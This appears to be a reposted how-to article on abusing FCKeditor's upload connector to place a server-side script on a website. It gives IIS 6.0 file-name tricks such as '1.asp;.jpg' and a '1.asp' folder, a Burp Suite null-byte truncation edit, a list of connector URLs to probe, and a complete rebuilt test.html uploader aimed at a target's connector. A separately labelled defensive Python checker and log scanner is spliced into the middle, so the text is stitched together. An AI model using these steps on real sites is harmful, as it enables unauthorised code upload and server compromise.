
About the FCKeditor upload issue

2025-03-28 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

Check the version first.

If it is IIS 6.0: upload 1.asp;.jpg twice, or create a 1.asp directory (a variant tries an underscore at the break point instead).

Or upload 1.asp;.jpg directly.

If the IIS 6.0 trick does not work, use Burp Suite to intercept the request:


Upload 1.asp;.jpg, and in Burp Suite change the semicolon to a space, then change the corresponding hex byte 20 to 00 and save; this adds the NUL truncation on top of the semicolon truncation.

If the upload test pages have been deleted, that is,

http://www.xxxx.com/fckeditor/editor/filemanager/browser/default/connectors/test.html

http://www.xxxx.com/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html

then first check whether the connector page itself exists on the site:

http://www.keio.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

http://www.keio.com/fckeditor/editor/filemanager/connectors/asp/connector.asp

http://www.keio.com/fckeditor/editor/filemanager/connectors/php/connector.php

http://www.keio.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp

Does one of these pages exist?
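As an added defender-side example (not code from the article), the same three file-name tricks turned into the allow-list check a connector should apply to uploaded file names and new folder names, plus a scan of constructed IIS-style log lines for the connector and test-page paths listed above. The log format, the client addresses and all sample values are assumed.

```python
import re
from urllib.parse import parse_qs

# Endpoints the article lists (connector scripts and both test pages): hits on them deserve review.
PROBE_MARKERS = ("/filemanager/connectors/", "/filemanager/browser/default/connectors/test.html",
                 "/filemanager/browser/default/connectors/uploadtest.html")
EXEC_EXT = {"asp", "aspx", "php", "jsp"}     # server-side extensions named in the article
IMAGE_EXT = {"jpg", "jpeg", "gif", "png"}    # what an image upload is allowed to be

def name_is_safe(name: str, must_be_image: bool = True) -> bool:
    """Allow-list check for an upload file name (must_be_image=False for a new folder name).
    Rejects NUL truncation, ';' truncation and an executable extension anywhere in the name
    (1.asp;.jpg, 1.asp%00.jpg, 1.asp.jpg, or a folder literally called 1.asp)."""
    if not name or "\x00" in name or ";" in name or "/" in name or "\\" in name:
        return False
    parts = name.lower().split(".")
    if not parts[0] or any(p in EXEC_EXT for p in parts[1:]):
        return False
    return (len(parts) > 1 and parts[-1] in IMAGE_EXT) if must_be_image else True

# Assumed log format: c-ip cs-method cs-uri-stem cs-uri-query sc-status ('-' = no query string).
LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$")

def flag_request(line: str):
    """Reason string if the line looks like FCKeditor connector abuse, else None."""
    m = LOG_RE.match(line.strip())
    if not m or not any(mark in m.group("stem").lower() for mark in PROBE_MARKERS):
        return None
    q = parse_qs(m.group("query")) if m.group("query") != "-" else {}  # parse_qs decodes %00 too
    cmd = q.get("Command", [""])[0]
    if cmd == "CreateFolder":
        folder = q.get("NewFolderName", [""])[0]
        if not name_is_safe(folder, must_be_image=False):
            return f"CreateFolder with suspicious name {folder!r}"
    if cmd == "FileUpload":
        return "FileUpload through connector"
    return "connector/test page probe"

def scan_log(text: str):
    """[(ip, reason)] for every flagged line of the log text."""
    return [(l.split()[0], flag_request(l)) for l in text.splitlines() if flag_request(l)]

# Constructed sample: one client probes the test page, creates a 1.asp folder, then uploads.
SAMPLE_LOG = """\
203.0.113.5 GET /fckeditor/editor/filemanager/browser/default/connectors/test.html - 200
203.0.113.5 GET /fckeditor/editor/filemanager/connectors/asp/connector.asp Command=CreateFolder&Type=File&CurrentFolder=/&NewFolderName=1.asp 200
203.0.113.5 POST /fckeditor/editor/filemanager/connectors/asp/connector.asp Command=FileUpload&Type=Image&CurrentFolder=/ 200
198.51.100.7 GET /index.asp - 200
"""
```

Feed real W3C log lines by adjusting LOG_RE to the fields your server writes; the three checks in name_is_safe are the ones to add to the connector itself.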

If so, a locally constructed test page can be used instead: change the connector address in the code below to the target's address.

Building FCKeditor's TEST.HTML locally for upload

Since the TEST.HTML upload 0day became public, many webmasters have deleted TEST.HTML, but the upload connector it calls has not been deleted. So you can construct the page yourself: save the following code as TEST.HTML, then modify the upload target inside it.

<html>
<head>
<title>FCKeditor - Connectors Tests</title>
<script type="text/javascript">
// Builds the connector URL from the selected connector, command, resource type and folder.
function BuildBaseUrl( command )
{
	var sUrl =
		document.getElementById('cmbConnector').value +
		'?Command=' + command +
		'&Type=' + document.getElementById('cmbType').value +
		'&CurrentFolder=' + encodeURIComponent( document.getElementById('txtFolder').value ) ;
	return sUrl ;
}

// Loads the URL in the result frame and shows it in the page.
function SetFrameUrl( url )
{
	document.getElementById('eRunningFrame').src = url ;
	document.getElementById('eUrl').innerHTML = url ;
}

function GetFolders()
{
	SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;
	return false ;
}

function GetFoldersAndFiles()
{
	SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;
	return false ;
}

function CreateFolder()
{
	var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;
	if ( ! sFolder )
		return false ;
	var sUrl = BuildBaseUrl( 'CreateFolder' ) ;
	sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;
	SetFrameUrl( sUrl ) ;
	return false ;
}

// Called back by the connector's upload response with its error number.
function OnUploadCompleted( errorNumber, fileName )
{
	switch ( errorNumber )
	{
		case 0 :
			alert( 'File uploaded with no errors' ) ;
			break ;
		case 201 :
			GetFoldersAndFiles() ;
			alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
			break ;
		case 202 :
			alert( 'Invalid file' ) ;
			break ;
		default :
			alert( 'Error on file upload. Error number: ' + errorNumber ) ;
			break ;
	}
}

// The connector's response script looks for window.parent.frames['frmUpload'].OnUploadCompleted.
window.frames.frmUpload = window ;

// Sets the upload form's action to the FileUpload URL just before the form is submitted.
function SetAction()
{
	var sUrl = BuildBaseUrl( 'FileUpload' ) ;
	document.getElementById('eUrl').innerHTML = sUrl ;
	document.getElementById('frmUpload').action = sUrl ;
}
</script>
</head>
<body>
<!-- Form markup restored from FCKeditor 2.x's own test.html; the copied page kept only the labels.
     Change the connector values below to the address you want the page to talk to. -->
Connector:
<select id="cmbConnector">
	<option value="asp/connector.asp" selected="selected">ASP</option>
	<option value="aspx/connector.aspx">ASP.Net</option>
	<option value="cfm/connector.cfm">ColdFusion</option>
	<option value="lasso/connector.lasso">Lasso</option>
	<option value="perl/connector.cgi">Perl</option>
	<option value="php/connector.php">PHP</option>
	<option value="py/connector.py">Python</option>
</select>
Current Folder <input id="txtFolder" type="text" value="/" />
Resource Type
<select id="cmbType">
	<option value="File" selected="selected">File</option>
	<option value="Image">Image</option>
	<option value="Flash">Flash</option>
	<option value="Media">Media</option>
	<option value="Invalid">Invalid Type (for testing)</option>
</select>
<br />
<a href="#" onclick="return GetFolders();">Get Folders</a>
<a href="#" onclick="return GetFoldersAndFiles();">Get Folders and Files</a>
<a href="#" onclick="return CreateFolder();">Create Folder</a>
<form id="frmUpload" method="post" target="eRunningFrame" enctype="multipart/form-data" onsubmit="SetAction();">
	Upload a new file: <input id="txtFileUpload" type="file" name="NewFile" />
	<input type="submit" value="Upload" />
</form>
URL: <span id="eUrl"></span>
<iframe id="eRunningFrame" name="eRunningFrame" src="about:blank" width="100%" height="300"></iframe>
</body>
</html>
